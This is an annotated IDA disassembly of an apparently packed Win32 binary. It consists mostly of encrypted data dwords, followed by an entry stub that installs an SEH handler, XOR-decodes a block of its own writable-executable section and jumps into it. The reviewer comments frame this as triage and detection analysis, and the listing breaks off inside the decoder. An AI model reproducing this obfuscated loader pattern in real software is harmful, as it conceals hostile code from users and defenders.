324F87EBh, 0B61FF725h, 0BA513DFh, 96CA61D0h dd 92DB32BDh, 0B527F910h, 0EBE5DE60h, 4728A67Bh, 4C2685F0h dd 3A0EBBDAh, 0E1081A0h, 7DF17581h, 893AD2A9h, 38C97830h dd 98B534F1h, 16AA2A00h, 34323FFEh, 0EF73285h, 39DB33C8h dd 3869D793h, 928668D4h, 0B8B5247Ah, 0A291810Ah, 95445225h dd 0FDE1E5A1h, 61F8D10Fh, 0E128AF4h, 8DBE4DBCh, 4268FDB4h dd 0A324A5C3h, 47A4894Bh, 0E669A2F9h, 53400448h, 37332E2Bh dd 89FF523Eh, 13BFA65h, 2806D7EAh, 46874099h, 0AD8A736Fh dd 557DFBC9h, 0B17B8721h, 0B7AFB43Ah, 9FB94B2Eh, 0C22AA4B8h dd 0B9507F54h, 574ACF3Eh, 0B4C9E7D8h, 3B61E593h, 21352A39h dd 54F3FAD8h, 9627AFFAh, 4EBC0B26h, 3E29A844h, 0DD659010h dd 1C0AB974h, 39E122E0h, 7C40BE93h, 6F5A4C53h, 0CA89F4F6h dd 7AA125E0h, 6A56C615h, 0B0C645E8h, 0F8BA5F32h, 0B7AB2884h dd 114FB39h, 0DFBBAE86h, 392199CDh, 8C34203Dh, 3DF79A86h dd 7B7CF2EBh, 0A3BCAF9h, 0BAE05A6Dh, 85BB386Eh, 0DA0116A8h dd 0CE9C9D41h, 0DBB17BABh, 3E0D8BFDh, 5870F03Ch, 738B1954h dd 8EA624F4h, 0A9C03F10h, 0C4DA592Bh, 20A72517h, 0CA2480F4h dd 0B8700C7Bh, 0D5310211h, 149C334Dh, 709998Bh, 18F872AAh dd 0F2D2619Bh, 0C0BE2A7Fh, 0AD813069h, 9B972B24h, 6819E21Fh dd 7D46C6F6h, 544FB9FEh, 3E189CCAh, 2E856DB1h, 0FCC17B9Dh dd 0CFD37F6Fh, 0FDD41240h, 0AD8F0832h, 9861C13Eh, 7E42EC10h dd 4F50D5FFh, 301AD7E8h, 390093A6h, 14E07F8Eh, 0D3D95B9Ch dd 0C8B60014h, 9ABB294Eh, 97971A2Fh, 8C7AC500h, 1849CA1Ah dd 532DB4DAh, 243784C7h, 21F99BFh, 0E4EB54E8h, 0C8D64662h dd 0DFA12371h, 0E1970A5Ch, 8C6FD366h, 6874E91Eh, 5972B5FCh dd 5306A4CBh, 310C8ECEh, 4ED41D7h, 0EECF48B4h, 0D4C9484Ch dd 0B5A23441h, 0DCB00326h, 0B17FEF19h, 4243C811h, 2B24C5FBh dd 328BFEBh, 0B1299AFh, 7AF77D88h, 0D8D94EBBh, 0DCB22278h dd 0A7882657h, 8B9A3428h, 4616D50Dh, 747CDBE7h, 5020BFF8h dd 2B0984FEh, 6AC365BDh, 0D6E97EABh, 0C5C3457Eh, 0C9B8144Fh dd 0B99F0958h, 0F144FD2Ah, 5F54FB35h, 634BD4E9h, 7133B8CFh dd 181482A1h, 0E94DDBh, 0FFCA40A2h, 0C2B52141h, 0A09C5A6Dh dd 92902233h, 9560E711h, 614FEF7Ch, 5C37A6C0h, 0C0EB1D9h dd 247BB8B2h, 11C06080h, 0FCDD5A6Ch, 0DBAC2752h, 0BB850E44h dd 0AB901238h, 
6A75D06Ch, 5E58D3E4h, 5A20A1CCh, 3205A4BAh dd 0CEC4FB1h, 0F0D27F82h, 0C5F7394Ah, 0DABD0556h, 9C882236h dd 0F56DEB35h, 6146D139h, 4C52D5D6h, 3329B6E7h, 1C139CADh dd 1DFF42DFh, 0FCD87894h, 0DDB72676h, 0A6AC0D30h, 978B1228h dd 9654A355h, 1959D8F2h, 5027B4CAh, 7E1092D1h, 1F1BB2FCh dd 0E7CB179Dh, 0F4F55665h, 0EBCD2973h, 0BAA1125Fh, 9A40E539h dd 6A75E81Bh, 5152C1FCh, 5901D0E2h, 3A04ADC9h, 18E756BDh dd 0FEC6559Dh, 0D3D86F0Eh, 0A7BB3F6Fh, 0B89C1910h, 9D67D95Fh dd 4726D41Ch, 5C20D2FDh, 3139B3FBh, 9319388h, 2D92758Eh dd 0E3D95994h, 0DD862A79h, 0CC820F5Fh, 93920819h, 6E7FD20Ch dd 687FAFE6h, 4326AEDCh, 223791C4h, 7EB76BBh, 0F5F87C88h dd 0C4DC595Ch, 0C89F504Dh, 0B68E187Dh, 9B43E12Dh, 4220FB1Fh dd 4349FAF9h, 1033A0C6h, 3F1280B3h, 3B8C79AFh, 0F5D56683h dd 0FBA43473h, 0A3B8355Fh, 99B0073Bh, 0BF7BC063h, 624BCD0Fh dd 532090F2h, 240FB7C5h, 290FB7CBh, 16C06487h, 0FCFF5864h dd 0C1A92C4Fh, 0D08A0C5Eh, 9BB1091Ch, 6F5FF908h, 6E34D7EBh dd 5F3F82D5h, 3B18B8D5h, 1CF666B5h, 0EFCB71A5h, 0D1F43962h dd 0AEB12368h, 0AF8D0811h, 0F666E834h, 6273D539h, 495BC8FEh dd 363081DFh, 321587B1h, 16E268ADh, 0DAAA5189h, 0CAB11262h dd 0B38D2443h, 889D033Fh, 6F75FF2Eh, 6E4FC1F3h, 3427A8F2h dd 3C3396FBh, 3E1A89A6h, 0F6EE6A83h, 0FBF95F64h, 0C0BC224Dh dd 0B89C353Bh, 8C6BEF03h, 5A78FF1Fh, 4D51C4FEh, 7C3C85C3h dd 4079FD0h, 1CE075ADh dd 0DEF32293h, 0C9CA6E4Eh, 0B3AD2358h, 0B19E1245h, 967FEE13h dd 6742CE19h, 432DA394h, 333EBEC0h, 151D91C8h, 8E07E8Bh dd 0F6C0559Ch, 0C0C82274h, 0CD940251h, 8C921E3Ch, 6078E66Ah dd 1D46D5EFh, 5239A5D7h, 250D88CAh, 1FEC6D90h, 0E9FF548Bh dd 0A2DD5B6Dh, 0D8A63F6Dh, 0AC89054Dh, 0B072E01Dh, 684FF11Bh dd 4359CEEDh, 3536A1FBh, 353BF0A7h, 18FF6EA9h, 0E1E7529Dh dd 0AC832F76h, 0A2A83567h, 96931B3Bh, 9375FF2Bh, 5647DB2Bh dd 45288D98h, 2E0FADD7h, 419A8B8h, 0ECFE5383h, 0DFF03067h dd 0FF9B0B4Bh, 95CB560Bh, 0BEFF321Fh, 6B59FF0Bh, 6A50C0E7h dd 6950B7C7h, 25248ED9h, 15CD6AB2h, 0CAD95A8Bh, 0C1DE680Dh dd 0B3B02179h, 0B08E383Ah, 8F4CED2Bh, 7476A239h, 5F5AEEF5h dd 3036B9FAh, 1E0DB6A3h, 7F798DE1h, 0FDFAE1D7h, 
58C54417h dd 0C8FB12BFh, 0E3937827h, 6B47C239h, 4BE32687h, 611A1C17h dd 1D34A3DCh, 0A4150183h, 79B29C1h, 0A4A38C2h, 0BAFF64F4h dd 16E1ACBFh, 59860F00h, 391EAC64h, 2453E774h, 0ABABDCCFh dd 585FC7C6h, 0F785C85Fh, 8EA52365h, 0F73C5640h, 1052582Bh dd 1378722Ch, 0FA65CC0Bh, 7E28B67Bh, 2E299397h, 48005FC7h dd 33799DC9h, 0E86B42B7h, 989F0742h, 26361145h, 0CED34834h dd 0B58983D5h, 11981BE0h, 12D0B1B5h, 284E5912h, 836AE789h dd 0BF7B5183h, 0A2329864h, 2C34383Ah, 0BED34B49h, 261238A8h dd 35820DA4h, 8322905Fh, 28240200h, 0BD1B3EA9h, 0D9F80E3Ch dd 77BE266Fh, 8B69A874h, 9F2B4214h, 4322A3D0h, 0D3DDC3CFh dd 8AD11565h, 0D5A32774h, 0DA47C580h, 0B39D1FAEh, 0A5223C46h dd 8198FEBDh, 1DEF3103h, 87D639F3h, 5F2F5639h, 0DD20B3D1h dd 564FC86Eh, 7067E4D9h, 11645A5Dh, 51EBEA8Ch, 7112FAF3h dd 0D6A210D8h, 0F3BC3FCFh, 0C1D655C0h, 31713243h, 0F73A93FFh dd 84A85C12h, 2B70A4FEh, 65968BFCh, 5F5CF4E2h, 1C9DCB62h dd 8F1EAF3Bh, 900B4527h, 0D154DAF5h, 0E6DE797Dh, 0C2489342h dd 1A5AAFE8h, 46B4FA63h, 0CA731BB2h, 1718B10h, 849C1AE0h dd 9CEDE58Dh, 0F5D7371h, 0D5DA73ECh, 0F10839DCh, 80949D71h dd 243AB983h, 0F57E2BA6h, 0ABBB65DFh, 76FF687Ch, 6553C6B2h dd 0A607BCD2h, 970ED27Ch, 8BA4BFCDh, 0A85FCD0Bh, 81D65811h dd 2E74E858h, 0C353192Ch, 5250C55Ch, 0FE4238E4h, 9F772915h dd 0B3224970h, 0DE734BCh, 0C2D9E839h, 801C975Bh, 0DE07BA8Dh dd 0B1557DDDh, 6241CF2Ch, 0E067F4D4h, 760A7FADh, 605B4CC3h dd 0BED4BB70h, 58B36D40h, 0C413E5B6h, 25BE2A75h, 0AB3E8CA4h dd 4251F3D5h, 5CCD76CCh, 9B0E0DDEh, 92AA2AF1h, 0ACC02B40h dd 5D215D2Fh, 0E3C85D17h, 7A9F6DEEh, 182CAF5Bh, 32229699h dd 4C63E55Bh, 322CAACDh, 146640E8h, 9C83185Ah, 2040852Dh dd 0D2E7673Dh, 0EF6BD105h, 6F1DF03Fh, 6137B588h, 1EC72FF0h dd 0C36DDB96h, 2BFCF052h, 8FCB75A2h, 0F1BD3C0Ch, 0E1F3E2D7h dd 23F17041h, 0C72083CBh, 0D1A3FD78h, 3FA2A9E6h, 2F8851FCh dd 826A7C6h, 0DF07EFB7h, 0CCAD1BD6h, 60B28692h, 0CA749F64h dd 6BFB4A67h, 5644D03Fh, 9669EBE8h, 354DCE0Bh, 8F544EB6h dd 99DB10BBh, 0D5CD4B47h, 0F0E76657h, 9644AF70h, 57EB5A17h dd 0F1078C9Ch, 2F546172h, 0DCAE4684h, 6C56E48Ch, 
73887A3Fh dd 0B6D10AEBh, 0B12725F2h, 0ECC0351Bh, 0D0A7D7A7h, 0F9167477h dd 0EB0F1BEFh, 0C429A84Ch, 0AB973CC0h, 0B6E8D170h, 6C7BF9CAh dd 7E96E461h, 0A38EAF00h, 348C596Eh, 4BEB6308h, 0EAFE7DB0h dd 7039A9ECh, 21B5F477h, 7E0184F0h, 9CE1CACFh, 21844513h dd 0E3F1D0DBh, 0F7EC680Bh, 9525C6D9h, 0E1B76D71h, 4A8D889Dh dd 0E623A176h, 293EBC21h, 1109E92Bh, 0D87BA48Dh, 788F0D7Ah dd 3FA2EE79h, 2ACB4E29h, 0C9DE5DA9h, 178D5777h, 0F028ADCAh dd 192D2705h, 13456B9Ah, 7043C194h, 131B9BEFh, 0BE35689Ch dd 1CCF4724h, 0D0EDB361h, 0A292124Eh, 9E02FED4h, 7D33B555h dd 0DD7073E1h, 8663DFA3h, 566DCCADh, 8EDAE42Fh, 0BC89B866h dd 0F77D0F0Eh, 2A870679h, 0DDF1704Dh, 967CE51Bh, 7647CB15h dd 2DD44093h, 0C35CEA86h, 53418107h, 5017992Bh, 0C7AD1BD6h dd 0B1C44670h, 9AB031B7h, 0E26E851Eh, 8F16A442h, 2C2AF316h dd 0FF7F9A9Dh, 237B4E3h, 0FE7D5183h, 86AD31D8h, 5E93328Fh dd 8CFB51B6h, 5728923Eh, 0C210EBD4h, 0CFD99F73h, 221FE506h dd 4056D44Fh, 0B7F0B2C1h, 75BC17B5h, 0BED4987Ch, 1E4A4022h dd 0C6EB7456h, 6C7E8F4Bh, 0FC3FA014h, 93A10D8Eh, 3075EDE4h dd 640F4B3Ah, 0E178F9FBh, 7FA63A81h, 12D82D88h, 4ACA490Fh dd 0E0CEFAA2h, 0B7379652h, 6F6FF229h, 7068D7E4h, 533CB4C9h dd 190689D8h, 1DEA6EB3h, 58931E88h, 53E8F687h, 215701FEh dd 0D8AE0741h, 9C5AD0A4h, 0B7962C6Fh, 933E8C8Ch, 4459D7BCh dd 0A039F648h, 1F70F21Fh, 0D9AEA550h, 0AFC44316h, 8D53F657h dd 1CADC48h, 0E2B8F7CBh, 79BB217Ah, 6049F7B5h, 0B136E4DFh dd 5855345Ah, 0A7EE93EAh, 8670B00Dh, 3CC18DA5h, 0D4E8669Eh dd 0CF6A813Ch, 5F1D9B71h, 0B6C7BDE0h, 3D63FB75h, 0DC62B235h dd 0EF001797h, 8D940C93h, 86D5B086h, 2059571Ah, 0D10D8145h dd 0F966D831h, 0A6D8A310h, 2D72EEF7h, 6D284E51h, 9E28F6F8h dd 4CBD7256h, 963BD3FEh, 0EAC87733h, 0C271A1B1h, 0E8FD2FCBh dd 3896F36Ah, 1146EAC9h, 0AAD834CDh, 0B868D692h, 6C830092h dd 8756A263h, 15B73709h, 0C95F4F6Ah, 0DC84740Eh, 0A406855Bh dd 27740A8Bh, 706ABABEh, 6B4A4057h, 18F9F0F2h, 0FD4E08E1h dd 42AB5EA8h, 27E23398h, 0F3514364h, 0E15B247Ah, 0FC680EA7h dd 654EFA1Bh, 0C3A4C1ECh, 62CC34EBh, 17F7DEC0h, 73944CC3h dd 94AD6289h, 0B5854EAAh, 53D1EFEBh, 
0A2748D50h, 68AF1166h dd 0AA3583A6h, 5CE5F594h, 276BD992h, 17332F54h, 0B0A12FDCh dd 969551B8h, 0B0565B28h, 0EF1091BCh, 84BC019Eh, 98249256h dd 1B11CA1Fh, 2F0A88ACh, 5E1FA3C5h, 7A900E89h, 10547E7Ch dd 0B0F5516Fh, 0E1FACBCDh, 6B06787Dh, 1248710h, 14D05501h dd 0CAB5F318h, 2CE06A49h, 380CEFEh, 0D29B73EBh, 0E20CB56h dd 31CF7E0Bh, 0E5C71FB9h, 0F2E34357h, 0A74CC21h, 0E542274h dd 0BBDDD295h, 585FC3C4h, 73E0DC51h, 0DE97DCA7h, 87DC8BEFh dd 5126581Bh, 0DFC358CFh, 0D46E09EAh, 10A1A64Bh, 2FD63EB1h dd 0C35EEC85h, 0D7F2CB9Ah, 7DA43C9Fh, 0ACB57974h, 26E2B691h dd 0CED34C52h, 0C78AF1DBh, 2FB5965Bh, 0E4D11A47h, 252E4912h dd 338E789h, 3CD55287h, 0A2AA8810h, 5CE9383Ah, 8EF953B0h dd 0AAC8AF40h, 913DAC61h, 6240C11Bh, 6807DFEAh, 2E3DBEDAh dd 7241C2AFh, 5BE260BAh, 0C1A916D4h, 0E897114Dh, 0BD9E0062h dd 8D920438h, 907ED311h, 7443D80Bh, 6E33A0CAh, 3A1085E0h dd 151898A4h, 0E0F045B4h, 0DDD65471h, 0C4A9287Dh, 0B3B6394Ah dd 886D1E26h, 7469FC1Ah, 535FF2D4h, 5730B8C7h, 3903BAD0h dd 2CFE66BEh, 0E5C354A1h, 0C2CE5A69h, 0A7B92778h, 8095032Ah dd 9F7EFC1Fh, 6B4CD117h, 5B01DAF7h, 2632B5DCh, 301F80A7h dd 36CD7C8Fh, 95D85995h, 0E4800A44h, 8EB21E65h, 85933411h dd 6E66FC1Ah, 4C6CDAE4h, 5A2FA7F5h, 0C3A97C1h, 0CF38DA5h dd 0E1CA6E85h, 0F0DF4674h, 0C295134Fh, 0A785054Ch, 0A404F132h dd 6F78EF10h, 5755F0FFh, 3E57D3D1h, 0ED22BEBFh, 1FB8561h dd 0E3CF5C9Ah, 0C2B4513Eh dd 0B4B63759h, 0B19D5D27h, 0B40EE207h, 3462E432h, 5A2BACFDh dd 233ABADEh, 2729ADC3h, 37ED33B6h, 0B8FE67B0h, 0C1A33F3Ch dd 0C4D71641h, 0E9FE9505h, 8544976Bh, 2E146068h, 57CA0B9Fh dd 526AD8ACh, 47E4962Bh, 60611EDFh, 0C9864D15h, 0AB61D83Bh dd 80EE5D6Ah, 8126BBF7h, 30A2C75Fh, 0B4BA170h, 69786A24h dd 2AFFF2F3h, 112A5ADCh, 0D02FA55Ch, 22C4733Dh, 0F8F735AAh dd 0A5718D4Ah, 5C1D9Fh, 0FA2C1A84h, 0BF162D56h, 7C764836h dd 6614ACCDh, 14661982h, 9C83187Ah, 0BFE9309Dh, 3AA1133Dh dd 0ED01805Ch, 295FDC3Dh, 217BF9CCh, 1103455Dh, 9566EB8Ch dd 72E212A3h, 72DEC9A2h, 3342C3F2h, 0C1E77C25h, 0DE85B0C6h dd 0FCE35AA1h, 4226A478h, 641EFCD4h, 918F4FFh, 0CA88F58Ah dd 7AA23AB0h, 
6A547D14h, 0B0CCAEE8h, 98B46032h, 0D4C82808h dd 4D5AD046h, 6AA45082h, 0DD4CFAB6h, 4F67E5BCh, 18F273A6h dd 0E3E97585h, 5FE73646h, 8BFB5DB7h, 0CF6EE33Dh, 0FE05B472h dd 35AD1343h, 0AC3B8995h, 0F7DF323h, 0CC8EBEC0h, 74BC20AAh dd 8FA34D65h, 1F4C4011h, 0C5EB4367h, 0ED48F91Eh, 130FBE49h dd 0EAD55BDCh, 0BFC004F0h, 4960EE90h, 0F1DE7A9Ah, 7E9624C5h dd 0B9E0BA8Dh, 0E09A492Bh, 0CF8E625Ch, 0EAFC1503h, 90E6176Ch dd 1F049997h, 4C150D25h, 0D0E76598h, 3C8533F5h, 3C2D189Ah dd 0A48A199Bh, 0EF840572h, 4F113F10h, 0F538AC49h, 2B65E2Eh dd 0EF3E8CBBh, 7374F92Fh, 4F9CF2C4h, 8770F22Ch, 0A3B85577h dd 0E2418415h, 9FDE6D25h, 0CCB281Fh, 0ED639Bh, 0C612E47h dd 671EC6AAh, 0A38BD5EBh, 0A081033Ch, 0B28C5B6Ch, 0C2CB6404h dd 4A12A42Bh, 562099C5h, 0EE319519h, 5C6AFF39h, 0A7BA7CBAh dd 3C62FEDCh, 73CBAECh, 20D95788h, 0A6CAB40Ch, 32423C3Eh dd 0C2E77C48h, 0A8EE9885h, 0F807622Bh, 5A75A479h, 7C00E8DFh dd 0A18F4E4h, 0F588F58Bh, 7BA23A93h, 96AD2715h, 0E28F1518h dd 0ADB71456h, 0A69E0F22h, 97E9C469h, 1C01858Eh, 19F9470Eh dd 3867D59Ch, 6B82001Ah, 799D71BBh, 919D7B9Dh, 244DD23h dd 5AEB5A21h, 0C22E73E4h, 5B72C873h, 0C222C72h, 84D5D497h dd 81E462CDh, 258C3AC3h, 0C6A64FA0h, 0ABC32840h, 1524DA2Dh dd 1E0FD9A0h, 0CEB20D9Ch, 162A9868h, 0B82DC8E3h, 0B560DEA2h dd 5451605Eh, 7F9AFCE6h, 0C9E72F01h, 86810A53h, 9CA04D05h dd 7E017D1Eh, 629BD1Ch, 2033DA14h, 8FC2CDA1h, 545AF019h dd 0B2388E8Fh, 62A02EDBh, 5A45CB3Ch, 0C0D45FCFh, 95A73A42h dd 0A24DC914h, 5C6FE559h, 5BAB4391h, 0C159E781h, 6BF0FD05h dd 0EA8F0DE2h, 94AA2D93h, 4F71CE16h, 93DE6D29h, 0CF01CAC1h dd 0F9FB9157h, 99D15370h, 4633A26h, 0CA6BE2B5h, 687FFFDFh dd 820AF46Bh, 0F6E03305h, 0B9CE4C21h, 0FE35F2C4h, 2B838166h dd 91D9AE0h, 49EC3DDAh, 0A8AC83A4h, 575EC643h, 7D0C75Ch dd 9E2C4AF9h, 3D413D0Fh, 0C3E87DB3h, 637193AEh, 0F93CABF2h dd 9E0ED07Ah, 1D625611h, 0D2A28BAEh, 6148DC21h, 0F89CD166h dd 97AE2D77h, 39C40792h, 42D29E34h, 0D8DCE9CAh, 2D92536Ah dd 1C3280A9h, 3627CBF4h, 0C497E4D2h, 6CB32B26h, 8861E46Dh dd 0A2B9578Dh, 285FC224h, 0D8DC4BB1h, 0A0549530h, 27C40A8Bh dd 0E7B9BABEh, 
401750A7h, 0E6FFF0C2h, 76BD2B6Dh, 90402E49h dd 0C43DBEE4h, 0C7DC5BBAh, 6B105E17h, 244AB50h, 2701CCEBh dd 8FFB4998h, 0FA61EF92h, 939E12CDh, 151AEA18h, 9B8110A9h dd 0A2A34A77h, 83E56438h, 1D6A8100h, 8A1AA844h, 0AC2197CCh dd 0B7EB137h, 0E364B9BCh, 54C28FDDh, 8341DEE6h, 0B4BA700Fh dd 8BC75662h, 0F8AB6540h, 0F8E80856h, 402C42B9h, 3B1BF999h dd 0C80AEA53h, 6F5EDC7Bh, 7A8CE6E1h, 0BB8E29FCh, 9EE53C21h dd 0F1FF7012h, 0C8DC5D68h, 7931EA50h, 115C88A2h, 7B0387D6h dd 0B032E396h, 59AAE745h, 285F98EBh, 0F5B53406h, 0E9981E21h dd 0FF18FDC3h, 7D888267h, 0A2E8943h, 3FDAB7E1h, 6F591BCEh dd 586FE857h, 17AF2EDAh, 71F223FFh, 99952785h, 0C81DDB2Bh dd 0B7F89916h, 0FA0D8C69h, 34EC1BF6h, 7D14C1A5h, 62AF4950h dd 0A2FCF7F9h, 0C819469Ah, 989F06D0h, 0A6FBED99h, 43E36205h dd 0D9D052DDh, 6ED6BD6Bh, 4D65E085h, 12A35960h, 0AAEAE789h dd 0FCAB7CD4h, 3D12E364h, 0A3891325h, 10215F95h, 318D7C35h dd 0BF870B1h, 0ED35D214h, 294A3686h, 8DD33C42h, 0E1FE3FE8h dd 77BE27F1h, 652E830Ah, 5290FBFFh, 0F8F7BDBAh, 8C4AF64Ah dd 0FF11A070h, 2844800Bh, 0CD47C5ECh, 7C487926h, 48C07BCDh dd 819826C5h, 19752077h, 0B7FC6B8Ch, 0D2E66539h, 0C02EFA92h dd 0EE1B995Eh, 0DEC94A80h, 3B550DFFh, 78435F31h, 8FD105E7h dd 0BB886167h, 5944B80Dh, 0C16DD127h, 59796F43h, 0F73AA76Dh dd 0EE73A312h, 1B6A3307h, 4A9B5CACh, 5F765042h, 2A5124E1h dd 0C5AF40ACh, 0B0AE447Dh, 9D205F32h, 0CCDFECB2h, 0F9969358h dd 11B4A17Dh, 0BC4BC99Fh, 7F48D333h, 520C72D0h, 99C2AC5h dd 0AF987693h, 0D0821E21h, 4015393Ch, 0F034A91Eh, 5E065F2h dd 2438600Fh, 0C155B9A5h, 685ED90Ah, 361EF6DAh, 0DA614DFh dd 2DCFC0E8h, 0C4DA5BEAh, 0F1BFF6CFh, 333D8D51h, 44786478h dd 7F40A8C4h, 66686850h, 0F785F8F9h, 7DA539CDh, 1CBFEE7Ah dd 0B3CA4B87h, 4B6DAA06h, 0E9CE531Fh, 6C48C63Ah, 1E3BB29Ah dd 4DDA32CFh, 0D76AD893h, 3B010C14h, 1A01EEDh, 93946A8Fh dd 0F55F9025h, 876CD578h, 263B875Bh, 0FFD46076h, 0ADB75D78h dd 4269F9F6h, 0E448B948h, 778F17DEh, 53A9FACAh, 4C33B2E3h dd 0E689D8A6h, 0EC3B777Ah, 714DAD2h, 4BA09D9Ch, 71FFC981h dd 5B3E2A7h, 65563DA6h, 0DEA39638h, 65DD5B74h, 3484526Ah dd 0A0E66A43h, 
0D14A0B8Bh, 408D8E5h, 65BAA5CAh, 0E2A52FEAh dd 0D0562A9Fh, 70B8289Ch, 0CF287831h, 2E343029h, 0C1D75690h dd 5732B070h, 7A006191h, 210B8BC5h, 0F4CA4392h, 79F0139Fh dd 637187A7h, 5690679Bh, 0C99181DCh, 9EFBAA63h, 0CBDDBD46h dd 2E189238h, 442B95E3h, 6F31EADAh, 761FF797h, 0CA68E5E4h dd 957DFF98h, 0D2A01867h, 0AFF4784Eh, 442E6CA6h, 95BC57C2h dd 750ACA0Dh, 0F4DF6143h, 1678EEB1h, 19D2DB94h, 648E103Fh dd 3BD8598Bh, 70BCA1F9h, 71F2BFEEh, 3A2519C4h, 0EE717BB8h dd 0C8F0719Dh, 153C40AEh, 41ADC396h, 0A19F214Fh, 637BF9CAh dd 0FE7B95B8h, 70B01F27h, 0B4CA4804h, 44D69C52h, 0DAD02EE4h dd 2790F36Ch, 520A33E0h, 31CAC2FAh, 0D86AE8BBh, 0B0863F8Bh dd 0D99B9F96h, 5C3F364Eh, 48D45326h, 0FAEE7B02h, 7007875Ch dd 0F23A19Dh, 2B62FF66h, 43B853A5h, 23F5F2C4h, 58AF2DFFh dd 472E27DAh, 46C44315h, 3621A3FFh, 0E431F544h, 0BD999166h dd 9672088h, 373B07B1h, 48882187h, 2DF734CDh, 0D91C9EF9h dd 75B3022Ah, 4732B261h, 0D3E7C9D2h, 0B99C0B55h, 0B1CAA41h dd 1219EE14h, 0C1C438A3h, 0D2621442h, 71880657h, 0A2F09478h dd 0F9363C3Eh, 2A095515h, 220E8E3Bh, 0B28AF72Dh, 1226C45Dh dd 7ABF3473h, 0CB48A0AEh, 5067F572h, 6BE813E2h, 96ABAB44h dd 14341118h, 0CE026182h, 0B9A4DEBDh, 90279B3Bh, 1CB3280Eh dd 0BF2ACA9Dh, 0AF987827h, 8C1EE82Dh, 0DC7E412h, 0EBB43A42h dd 0BA90DD33h, 5EC32915h, 0F205DBDEh, 2C665973h, 61B99ADh dd 0CB7E9F2Eh, 0DFFAFF8Bh, 75BC248Bh, 0E3AF6FCEh, 0A38BC911h dd 45CB182Ch, 6AF52C2Bh dd 0CC21D1E6h, 1E68A97Dh, 3158096h, 68EBBA63h, 3C7976AFh dd 51A1A965h, 95B02F31h, 4A37F598h, 83519CC8h, 14FE4D7Ch dd 36330AF8h, 6F814D87h, 0C54FFD8Fh, 6440E92Eh, 54088ED6h dd 7A02EDFh, 95947A99h, 0AA860227h, 0EC5B9242h, 908B773h dd 200934E2h, 1D8B4391h, 0BB59E785h, 6E5EF350h, 563A80E0h dd 6BAA18D6h, 9FEA70A3h, 5F210B31h, 0E5C85DC1h, 2E2434E4h dd 0D92EACB1h, 3449C773h, 4F0EBFB5h, 415E104Eh, 73C218DAh dd 0E631F20Ah, 3CCE7D35h, 1C6BA4FBh, 2E0D71A9h, 3908E3F5h dd 3305758Ah, 4853FBA4h, 2BEF8AA2h, 3E50BFDh, 65C43181h dd 5741C2CBh, 5F30525Fh, 360D8EB8h, 6F374B2h, 3ED88B1Bh dd 3F7696ECh, 475DFE16h, 0C49096C8h, 96CEE1Ch, 0B3EAA7C7h dd 
9D7DCA29h, 46E25119h, 699A731Fh, 70159350h, 1D5AE6A1h
                dd 0BC4D349Eh, 3688C7Ch, 0B516FE83h, 49E2CC4h, 9C393FCDh
                dd 0E1ED6E78h, 1E6F684Ah, 0E4F6D5Eh, 72C9608Bh, 46C34571h
                dd 41236D6Bh, 0EA99F0C2h, 768D2465h, 91B8CEF8h, 8C004113h
                dd 0C7ECE32Eh, 0E11E7549h, 3F108F64h, 43A6A95Ah, 1F8BC8BCh
                dd 37612731h, 65949AD5h, 0B9715E7h, 0C6811456h, 5B4A5096h
                dd 0D1D54DD3h, 1310C1BBh, 3D8F991h, 1180h dup(0)
UPX2            ends

; Section 4. (virtual address 00024000)
; Virtual size                  : 00008000 (  32768.)
; Section size in file          : 00002800 (  10240.)
; Offset to raw data for section: 00024000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment     : default
; ===========================================================================

; Segment type: Pure code
; Segment permissions: Read/Write/Execute
;
; NOTE(review): this segment holds the program entry point and is mapped
; writable and executable at the same time (flags above). The stub below
; depends on that: it rewrites bytes of its own segment and then jumps into
; them. A W+X entry section whose code stores into its own section is a useful
; triage/detection signal on its own.
_idata2         segment para public 'CODE' use32
                assume cs:_idata2
                ;org 31444000h
                assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
                dd 80h dup(0)

; =============== S U B R O U T I N E =======================================
;
; start -- program entry point (named by the closing `end start` directive).
;
; Flow, as far as the listing shows:
;   1. Builds an ebp frame and calls sub_3144421C. That routine never returns
;      here; it ends in `jmp ebx` after decoding a block of bytes in place.
;   2. The return address pushed by that first call is the address of
;      `call sub_31444288` (start+8). sub_3144421C immediately executes
;      `push fs:0 / mov fs:0, esp`, so under the Win32 SEH record layout
;      {Next, Handler} that return address sits in the Handler slot.
;      NOTE(review): the second call therefore looks reachable only as an
;      exception handler while the decode loop runs -- confirm dynamically.
;   3. sub_31444288 then redirects the faulting context to the instruction
;      after the call (start+0Dh), i.e. the push/pop/add/jmp tail below.
;
; IDA attributes kept from the original listing:
; Attributes: noreturn bp-based frame

                public start
start           proc near
                push    ebp                     ; standard frame; sub_3144421C's `leave` unwinds it
                mov     ebp, esp
                call    sub_3144421C            ; decode stub; pushed return address = start+8
                call    sub_31444288            ; start+8: presumably entered as the SEH handler (see header)
                push    dword ptr fs:0          ; start+0Dh: ebp = current head of the SEH chain ...
                pop     ebp
                add     ebp, 8                  ; ... plus 8 (just past a two-dword SEH record)
                jmp     near ptr 314D0805h      ; NOTE(review): target is outside 31444000h+8000h given in
                                                ; the section header above -- verify what, if anything, is mapped there
start           endp


; =============== S U B R O U T I N E =======================================
;
; sub_3144421C -- in-place single-byte XOR decoder followed by a jump into the
; decoded bytes.
;
; In:    [esp] = return address into start (used as SEH handler address, see
;        start); ebp = start's frame pointer (consumed by `leave`).
; Out:   does not return; control leaves through `jmp ebx`.
; Work:  count = 243Ch bytes, key = 12h (low byte of si), pointer = address
;        obtained with call $+5 / pop, plus 47h.
;        NOTE(review): by the offsets IDA reports (loop label at 31444263h,
;        next routine at 31444288h) the pointer appears to land on the first
;        byte after sub_31444288, i.e. the `db 82h, 0FAh, 12h` blob below --
;        confirm against the binary.
; Stack: eleven dwords are pushed and never read in the visible code; they
;        are discarded when esp is reloaded from fs:0. Their purpose is not
;        evident from this listing.

sub_3144421C    proc near               ; CODE XREF: start+3p
                push    dword ptr fs:0          ; SEH record .Next = previous chain head
                mov     fs:0, esp               ; install record; .Handler slot is our return address
                xor     eax, eax                ; eax = 0 (also clears al/ah for the loop)
                push    1                       ; -- eleven pushes, unused below (see header) --
                push    eax
                push    eax
                push    eax
                push    80000000h
                push    80000000h
                push    2
                push    eax
                push    eax
                push    80000000h
                push    eax
                call    $+5                     ; position-independent "get EIP": pushes address of next insn
                pop     ebx                     ; ebx = address of this pop
                sub     ebx, 0FFFFFFB9h         ; subtracting -47h: ebx += 47h -> start of encoded region
                xor     edi, edi
                or      edi, 243Ch              ; edi = 243Ch, number of bytes to decode
                mov     esi, 12h                ; XOR key; only the low byte reaches memory
